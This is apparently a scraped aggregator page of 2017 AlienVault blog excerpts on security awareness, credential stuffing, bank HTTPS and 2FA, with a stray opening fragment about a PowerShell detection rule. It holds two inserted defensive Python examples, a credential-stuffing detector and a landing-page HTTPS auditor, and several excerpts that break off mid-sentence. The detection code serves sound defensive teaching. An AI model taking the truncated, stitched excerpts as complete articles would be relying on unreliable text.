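The last sample (a plain -File launch of an admin script) is left alone on purpose: the point is to alert on the abuse patterns, not on every PowerShell invocation, otherwise the rule drowns in noise from legitimate automation. Enabling command-line auditing (Sysmon, or 4688 with "Include command line in process creation events") is the prerequisite; without it none of these fields exist to inspect.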
AlienVault.webp 2018-01-02 14:00:00 I Am Dave (lien direct) This cartoon has been making the rounds on the internet for a long time. It depicts how all security technologies and efforts can be undone by “Dave” the ‘stupid user’. I can’t think of many (well, no) real industries that treat their users, peers, and customers with the same level of disdain. Imagine the automotive industry pushing a similar message. ‘On one hand we have seatbelts, ABS, airbags, five star safety features… and on the other hand we have dumb drivers.’ Or a gym stating, ‘We have personal trainers, protein shakes, free weights, machines, exercise classes… and on the other hand, we have lazy people that just want to binge watch shows and eat pizza.’ Maybe a college could claim, ‘We have the best teachers in the world, pity about the unruly students.’ No, seriously, I mean, governments have been overthrown for a lot less. I’m frankly quite surprised there hasn’t been at least some level of civil unrest where an unruly mob surrounded the IT Security department, only to be dispersed by the CISO, dressed in full riot gear with a water cannon. While most security advice for users is all well and good, it is far from practical for the vast majority. How do I know this? Well, after giving out security advice for most of my career, I recently found myself falling short of much of my own advice. Our CISO at AlienVault, John McLeod, is a very nice man. But I did feel the urge to shake a fist at him a few days ago after I fell victim to a rather clever phishing email he’d sent out as part of an awareness campaign. It was well-crafted, had no grammatical errors, and in my haste while on my phone, I clicked on the embedded link. There goes my perfect record of not falling for a simulated phishing email. Then I was hit by a second surprise as I was informed by a service provider that my account had been disabled due to my credentials being found in a breach. 
I was grateful to the service provider for informing me, so I went about diligently changing my password, when I realised that this provider also had two-factor authentication which I had not enabled. Three strikes. I then spent the better part of the next two hours changing old passwords (I may have reused a couple), enabling two-factor authentication wherever it was available, and searching for all my various credentials on haveibeenpwned.com. It made me realise how far security still has to go in perfecting its user experience: creating products that users genuinely find useful, usable, credible, accessible, valuable, or even desirable. But most of all, it made me realise that while I may work in IT Security, I too am Dave.
AlienVault.webp 2017-12-29 14:00:00 Things I Hearted this Week – 29th December 2017 (lien direct) And here we are, the last week of 2017! Congratulations for making it through and thank you for sticking with us. I really enjoy pulling together these weekly recaps, and I hope you enjoy them and find them informative. This week has been a quiet week as people seem to be in constant limbo as to whether they should be working or vacationing. But I searched tirelessly for you – because that’s just the kind of person I am. Enjoy, and hope to see you again in 2018. Vendor Analyst Briefings Our very own Kate Brew started off a discussion on Twitter a few days ago on how many vendors don’t know how to brief analysts. Anton Chuvakin of Gartner chimed in with a detailed listing of dos and don’ts, followed closely by Adrian Sanabria sharing his experiences. Not wanting to be left out, I also added my 2 cents, thus completing the trilogy. Important: How to Impress / Annoy an Analyst During a Vendor Briefing? Best / Worst Tips Here! | Anton Chuvakin, Gartner What is your product and what does it do? | Adrian Sanabria, Savage Security Analyst Vendor Briefings | Javvad Malik, J4vv4D Dressed for success Ed Amoroso offers some personal advice (especially for Millennials) on proper dress selection for men and women in the modern technology-based work environment, focused on showing respect for others. Dress for Tech Success | Edward Amoroso, LinkedIn Credential Stuffing With quite literally billions of leaked credentials available online, it is highly likely that some of these will be credentials for your customers — or worse — for your employees or organisation. Attackers can then systematically replay those credentials against your login service in an attempt to take over the accounts.
This article will provide you with an overview of why and how these attacks take place, as well as provide you with some fingerprints and identifiers to help you monitor your environment for these types of attacks. Credential Stuffing: How breached credentials are put to bad use. | Breachinsider.com Cryptocurrency mining malware Digimine spreads via Facebook messenger using a Google Chrome browser extension. This isn’t the first, and certainly won’t be the last example of cryptomining malware – something we may see increase in 2018. I should have added it to my list of predictions! Digimine Malware Steals Your Computer Power to Mine Crypto-Currency | eWeek Rating Citizens The Chinese government plans to launch its Social Credit System in 2020. The aim? To judge the trustworthiness – or otherwise – of its 1.3 billion residents
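The credential stuffing item above points to "fingerprints and identifiers" for spotting these attacks in your own environment. The following is an added example, not code from the article or from Breachinsider.com, that shows the shape of such a detector: it parses a hypothetical login-event log format (the format, usernames and TEST-NET addresses are all constructed for the example) and flags source IPs that try many different accounts with a high failure rate, reporting any accounts where a login from that source succeeded, since those are the probable takeovers. A user fumbling their own password hits one account and is not flagged.

```python
import re
from collections import defaultdict

# Constructed sample of web-app login events (invented users, TEST-NET
# addresses); not taken from the article or from any real system.
SAMPLE_LOG = """\
2017-12-27T09:00:01Z login fail user=alice ip=203.0.113.7 ua="python-requests/2.18"
2017-12-27T09:00:02Z login fail user=bob ip=203.0.113.7 ua="python-requests/2.18"
2017-12-27T09:00:02Z login fail user=carol ip=203.0.113.7 ua="python-requests/2.18"
2017-12-27T09:00:03Z login ok user=dave ip=203.0.113.7 ua="python-requests/2.18"
2017-12-27T09:00:03Z login fail user=erin ip=203.0.113.7 ua="python-requests/2.18"
2017-12-27T09:00:04Z login fail user=frank ip=203.0.113.7 ua="python-requests/2.18"
2017-12-27T09:00:05Z login fail user=alice ip=198.51.100.5 ua="Mozilla/5.0 (X11; Linux x86_64)"
2017-12-27T09:00:20Z login fail user=alice ip=198.51.100.5 ua="Mozilla/5.0 (X11; Linux x86_64)"
2017-12-27T09:00:40Z login ok user=alice ip=198.51.100.5 ua="Mozilla/5.0 (X11; Linux x86_64)"
2017-12-27T09:01:00Z login ok user=bob ip=192.0.2.10 ua="Mozilla/5.0 (Windows NT 10.0)"
"""

# Hypothetical log line layout used by SAMPLE_LOG.
LINE_RE = re.compile(
    r'^(?P<ts>\S+) login (?P<result>ok|fail) user=(?P<user>\S+) '
    r'ip=(?P<ip>\S+) ua="(?P<ua>[^"]*)"$'
)


def parse_log(text):
    """Turn the log text into a list of event dicts, skipping unparseable lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def detect_stuffing(events, min_attempts=5, min_distinct_users=4, max_success_ratio=0.2):
    """Flag source IPs whose behaviour looks like credential stuffing: many
    attempts spread over many *different* accounts, almost all failing.

    Returns {ip: summary} for flagged IPs; 'compromised' lists the accounts
    where a login from that IP succeeded and should be reset."""
    per_ip = defaultdict(lambda: {"attempts": 0, "users": set(), "uas": set(), "successes": []})
    for e in events:
        s = per_ip[e["ip"]]
        s["attempts"] += 1
        s["users"].add(e["user"])
        s["uas"].add(e["ua"])          # one UA across many accounts is itself a fingerprint
        if e["result"] == "ok":
            s["successes"].append(e["user"])

    flagged = {}
    for ip, s in per_ip.items():
        success_ratio = len(s["successes"]) / s["attempts"]
        if (s["attempts"] >= min_attempts
                and len(s["users"]) >= min_distinct_users
                and success_ratio <= max_success_ratio):
            flagged[ip] = {
                "attempts": s["attempts"],
                "distinct_users": len(s["users"]),
                "success_ratio": round(success_ratio, 3),
                "user_agents": sorted(s["uas"]),
                "compromised": sorted(set(s["successes"])),
            }
    return flagged


if __name__ == "__main__":
    for ip, summary in detect_stuffing(parse_log(SAMPLE_LOG)).items():
        print(ip, summary)
```

The thresholds are deliberately parameters: on a consumer site with millions of users you would raise `min_attempts` and run the same aggregation per time window; behind a shared corporate NAT you would add the user-agent and distinct-account signals rather than relying on the IP alone.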
AlienVault.webp 2017-12-27 14:00:00 Why Healthcare Security Awareness Training Doesn\'t Work (And What to Do About It) (lien direct) The last five years have seen a meteoric rise in the number of cyberattacks targeting healthcare organizations. Why? Because healthcare organizations have some of the lowest security budgets of any industry, and personal healthcare records are worth a fortune on the dark web. Don’t believe me? Try this: Threat actors can make between $285,000 and $1.7 million from a single successful healthcare data breach. At that rate of return, it really shouldn’t be surprising to see how regularly healthcare breaches are hitting the headlines. If you’re in the healthcare industry, you’re probably feeling concerned. After all, healthcare organizations are highly complex environments and they can be a tremendous challenge to secure. Where should you even start? User-Centric Security Before you start spending big on expensive security products, it makes sense to look at where the greatest risks lie. To do that, let’s take a look at the most common causes of healthcare data breaches in recent years. According to the 2016 Data Breach Investigations Report, produced by Verizon, there are three primary concerns: 1. Insiders (mainly negligence) 2. Lost or stolen devices 3. Phishing Do you notice anything about these threats? Here’s a clue: They aren’t rooted in technology. Quite the opposite, in fact: they’re all rooted in human behavior. Now, of course, security products can be invaluable in dealing with these threats. Devices can be encrypted, user access levels can be tightly controlled, and network activity can be monitored. You can even use spam filters and content scanners to weed out most malicious communications. But what you can’t do is totally isolate your users from malicious activity… it’s just not possible. One way or another your users will be exposed, and they must be ready to deal with it.
By making the effort to properly train your users, you can hugely raise the security profile of your organization. Out with the Old If I had to guess, I’d say your existing security awareness training is… less than comprehensive. You’re not alone. In most healthcare organizations, security awareness training wouldn’t even exist if it weren’t a major requirement of HIPAA compliance. But knowing that the greatest threats to your organization are all rooted in human error, doesn’t that seem crazy? If you’re genuinely serious about reducing cyber risk, there are going to need to be some dramatic changes. Perhaps the biggest problem I see with the average security training program is that it is focused on completely the wrong metric: awareness. Ask any behavioral psychologist whether having more information causes people to make better decisions, and you know what they’ll say? Absolutely not. That’s why, despite understanding more than ever about nutrition, we have a glo
AlienVault.webp 2017-12-22 14:00:00 Things I Hearted this Week 22nd December 2017 (lien direct) But we’ve always done (in)security this way Being an operator for the Twitter account of any large brand can be challenging and tough at the best of times. But it can be even more so when faced with security questions. When security experts on Twitter questioned NatWest_help why the homepage wasn’t served over HTTPS, the bank initially tried to downplay the issue. But the public pressure on Twitter forced the change. Troy Hunt led the charge with “Securittyyyyy”, much like Mel Gibson declared “Freeedom” in Braveheart, and NatWest finally gave in and upgraded within 48 hours. The Security Avengers (name pending) then fired a warning shot across other major banks which did not have secure homepages, which has likely had many a security executive in a boardroom explaining likelihood-and-impact slides. I'm Sorry You Feel This Way NatWest, but HTTPS on Your Landing Page Is Important | Troy Hunt NatWest overhauls web security after online confrontation | Computing NatWest changes website security following heated exchange with cyber experts | ITPro NatWest bank spat prompts web security changes | BBC Why incident response is the best cybersecurity ROI Many times, there is little influence over what companies run and what it runs on. Chances are there will be failures or breaches – what is within the sphere of control is how well those incidents are responded to. Why incident response is the best cybersecurity ROI | CSO Online Welcome to the hotel hackifornia Christoph Brandstatter is managing director of the four-star Seehotel Jagerwirt, in Austria's Alps. His hotel's electronic door locks and other systems were hacked for ransom four times between December 2016 and January 2017. He paid a ransom of two bitcoins, which at that time was about €1,600 (£1,406; $1,882). He’s trained his staff to recognise phishing emails that may seem genuine but actually contain malware.
And he's moved back to traditional metal keys. Lock out: The Austrian hotel that was hacked four times | BBC The restaurant that didn’t exist People increasingly make decisions based on what they read on the internet. There’s an inherent trust about it. You book a cab through an app to take you to the airport, where you board a plane which you booked online, to go and stay in a stranger's apartment you found through a different site. But it’s a fragile ecosystem that’s open to abuse, as one freelance writer discovered when his unique restaurant beat out thousands of others to rank well on TripAdvisor for a time, drawing a flood of interest. The problem was, it didn’t exist. Guideline
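The NatWest item above turns on a point that is often missed: a login form that *posts* to HTTPS is not safe if the page carrying the form is delivered over plain HTTP, because an on-path attacker can rewrite the form action or inject a script before the user ever types a password. The following is an added example, not code from the article or from any of the linked pieces, of a small audit you can run over an already-fetched landing page. The bank hostname, headers and markup are constructed for the example and are not the real NatWest page.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _PageScan(HTMLParser):
    """Collect the forms (and whether they carry a password field) and the
    sub-resources a page loads, resolving relative URLs against the page URL."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []                 # {"action": absolute URL, "password": bool}
        self.insecure_subresources = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": urljoin(self.page_url, a.get("action", "")), "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("type", "").lower() == "password":
            self._form["password"] = True
        elif tag in ("script", "img", "iframe") or (tag == "link" and "stylesheet" in a.get("rel", "")):
            src = a.get("src") or a.get("href")
            if src and urlparse(urljoin(self.page_url, src)).scheme == "http":
                self.insecure_subresources.append(src)

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def audit_landing_page(page_url, headers, body):
    """Return a list of findings for a fetched landing page (URL, response
    headers, HTML body). An HTTP page is reported as a whole; an HTTPS page
    is checked for HSTS, a login form posting to a non-HTTPS action, and
    mixed content."""
    findings = []
    hdrs = {k.lower(): v for k, v in headers.items()}
    scan = _PageScan(page_url)
    scan.feed(body)
    login_forms = [f for f in scan.forms if f["password"]]

    if urlparse(page_url).scheme != "https":
        findings.append("page served over plain HTTP: content can be altered in transit")
        for f in login_forms:
            findings.append("login form on an HTTP page (posts to %s): the form and scripts "
                            "can be rewritten by an on-path attacker" % f["action"])
        return findings

    if "strict-transport-security" not in hdrs:
        findings.append("no Strict-Transport-Security header: the first visit via http:// is still interceptable")
    for f in login_forms:
        if urlparse(f["action"]).scheme != "https":
            findings.append("login form posts credentials to %s (not HTTPS)" % f["action"])
    for src in scan.insecure_subresources:
        findings.append("mixed content: %s is loaded over HTTP and can be replaced" % src)
    return findings


# Constructed example markup (not the real NatWest page).
LANDING_PAGE = """
<html><body>
<form action="https://www.example-bank.test/login" method="post">
  <input name="customer_number"><input type="password" name="pin">
</form>
<script src="/static/app.js"></script>
</body></html>
"""

MIXED_CONTENT_PAGE = LANDING_PAGE.replace("/static/app.js", "http://cdn.example-bank.test/app.js")


def before_and_after():
    """The same markup served first over HTTP and then over HTTPS with HSTS."""
    before = audit_landing_page("http://www.example-bank.test/", {}, LANDING_PAGE)
    after = audit_landing_page(
        "https://www.example-bank.test/",
        {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"},
        LANDING_PAGE,
    )
    return before, after


if __name__ == "__main__":
    before, after = before_and_after()
    print("HTTP landing page:", *before, sep="\n  ")
    print("HTTPS landing page with HSTS:", after or "no findings")
```

Note that the form in the constructed page already posts to HTTPS; the HTTP version is still reported, which is exactly the "but the form is secure" argument the bank made and the reason it does not hold.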
AlienVault.webp 2017-12-20 14:00:00 Building Personal Brand: From One InfoSec Student to Another (lien direct) Finding employment opportunities as a student is challenging; this is nothing new. Students consistently struggle to find internships and co-op opportunities. I myself am a student, and I have found a solution that has been effective for career development thus far: personal branding. Personal branding helps students compensate for the work experience that we just haven’t had the opportunity to gain yet. Personal branding means building a “brand” that people associate with you. You have probably already started developing your own personal brand with personalized resumes and cover letters. These are essentials that our teachers always told us we would need, and that is true; however, it is 2017, and with more students than ever before, the job market has become very competitive. The opportunities to find internships as an undergrad still very much exist. We are going to take a look at what you can do to break away from the job-searching norms by building your personal brand. Personal brand plays a key role in developing your identity as an aspiring security professional. This article will help guide you to become the nontraditional student that you need to be to land interesting interviews. The pitch. “Could you tell me a bit about yourself?” Be prepared to respond to this question comfortably at a moment’s notice. Know what your personal selling features are, and present your achievements proudly and passionately, but not arrogantly. Knowing what to say in “elevator talk” situations allows us to network on the fly at any given moment. The resume. It is an obvious expectation of any serious employer that your resume looks good. Your resume will act as a professional summary of your identity, and employers will profile you accordingly.
Dedicate some of your efforts to ensuring that your resume effectively and professionally reflects your skillset, goals, past experiences, and projects. Keep your resume up to date, and actively rework it when you can. The business card. Some people may consider a contact card overkill, especially for students, but I disagree. The need for us to differentiate ourselves as students is becoming ever greater, in proportion to the number of graduates being produced by academia and the other routes job-seekers take to educate themselves. I printed some contact cards using VistaPrint for my first few conferences (DEF CON, Black Hat USA, and HackFest), and I have received only positive feedback; in fact, the CEO of the cybersecurity firm that I will be interning at in May was impressed, responding “Wow, this kid has a business card? He’s serious.” The act of handing someone a contact card alone Guideline
AlienVault.webp 2017-12-19 14:00:00 My Password Pal (lien direct) “Sorry pal, my password is Spring2017. Deal with it.” Someone said those words to me the other day. As an InfoSec professional, I’ve grown accustomed to this type of indignant proclamation. My jaw no longer drops to the table when I hear folks speaking this way, but I still have trouble stifling an audible sigh. As usual, when confronted with this reality, I experience the usual stages of information security grief. Why don’t they get it? Where have we gone wrong? Should we give up? Who still uses the phrase “Deal with it?” Fortunately, the statement made by my password “pal” was in the context of getting set up with a multi-factor login system. I have been a strong supporter of two-factor authentication for a long time. I even took the bold step to predict that at least one social media platform would force 2FA on all their subscribers this year. So far, this has not happened, and even though no one is forcing 2FA upon their subscribers, it seems to be getting some attention and adoption in many corporate settings. In fact, a new regulation in New York prescribes multi-factor authentication for all remote logins unless the CISO has approved in writing the use of reasonably equivalent or more secure access controls. What is the meaning of a “reasonably equivalent control”? In InfoSec, we call those “compensating controls”. These controls were introduced in the first version of the Payment Card Industry Data Security Standard (PCI DSS). The standard definition of compensating controls consists of four parts. Compensating controls MUST: (1) meet the intent and rigor of the original control; (2) provide a similar level of defense as the original requirement; (3) be “above and beyond” other requirements; and (4) be commensurate with the additional risk imposed by not adhering to the original requirement. That is a tall order to fill, and it seems much more difficult than instituting a 2FA solution.
There are so many multi-factor options out there today that one has to wonder why people aren’t jumping on board with these systems. 2FA isn’t limited to corporate systems. Some tools that folks can use on their personal accounts are free, such as the “authenticator” applications offered by some vendors. Some services, such as Twitter, and at least one security organization (EC-Council), are still using SMS-based two-step verification; we know that isn’t perfect, but it is still better than no second factor at all. A 2FA system eases the sting of bad passwords considerably. Now when someone tells me “that’s my password pal, deal with it”, I no longer have to sigh. While my internal cynic may respond in kind, “well now you have 2FA, so YOU deal with it, Sparky”, I am comforted, however slightly, that an attacker has to jump one more hurdle before he can log into the account of mister “Spring2017”.
Last update at: 2024-04-25 10:08:02